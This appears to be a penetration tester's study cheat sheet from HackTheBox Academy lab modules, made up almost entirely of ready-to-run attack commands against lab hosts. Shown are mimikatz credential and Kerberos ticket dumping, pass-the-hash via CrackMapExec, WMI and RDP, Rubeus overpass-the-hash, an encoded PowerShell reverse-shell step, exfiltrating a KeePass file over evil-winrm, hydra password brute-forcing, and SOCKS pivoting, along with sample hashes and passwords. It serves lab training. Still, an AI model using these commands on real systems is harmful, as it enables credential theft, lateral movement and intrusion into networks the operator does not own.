`crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami`
Dump all credentials currently in memory (needs local admin / SeDebugPrivilege):
```
mimikatz.exe privilege::debug sekurlsa::logonpasswords
```
Pass the hash to spawn cmd.exe as another user; the new process can then launch a reverse shell
reference: https://academy.hackthebox.com/module/147/section/1638
payload generator: https://www.revshells.com/
```
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
```
```
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <payload>"
```
RDP with a hash (requires Restricted Admin mode on the target):
Enable it first (needs admin rights on the target):
`reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f`
```
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
```
Kerberos:
see
https://academy.hackthebox.com/module/147/section/1639
```
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
exit
dir *.kirbi
```
Dump the Kerberos keys of all logged-on users:
```
mimikatz.exe
privilege::debug
sekurlsa::ekeys
the aes256_hmac keys in the output are used for Pass the Key / OverPass the Hash (Rubeus asktgt /aes256:..., below)
```
Rubeus - Pass the Key or OverPass the Hash
```
Rubeus.exe asktgt /domain:inlanefreight.htb /user:john /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /nowrap
```
Linux: Pass the Ticket (PtT)
Check whether the Linux host is domain-joined:
realm list
Look for keytab files (they must be readable to extract keys from them):
find / -name "*keytab*" -ls 2>/dev/null
WINRM:
evil-winrm -i 10.129.202.222 -u johanna -p 1231234!
*Evil-WinRM* PS C:\Users\johanna\Documents> download Logins.kdbx /home/htb/Logins.kdbx
pop3:
```
smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.203.12
hydra -l marlin@inlanefreight.htb -P pws.list -f 10.129.203.12 pop3
telnet 10.129.203.12 110
```
SSH SOCKS proxy for RDP into an internal network (pivot):
set the proxy in /etc/proxychains.conf (or proxychains4.conf): socks5 127.0.0.1 9050, then
ssh -D 9050 ubuntu@10.129.119.190
proxychains4 xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
Ping sweep, Linux:
for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
Ping sweep, Windows cmd:
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
Login form brute force:
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 94.237.53.3 -s 31276 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"
F=<form name='log-in' is the failure condition: any response containing that string counts as a failed login and hydra keeps going; -f stops at the first valid pair
NFS:
```
kappamoss@htb[/htb]$ proxychains showmount -e 172.16.8.20
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.20:111-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.20:2049-<><>-OK
Export list for 172.16.8.20:
/DEV01 (everyone)
```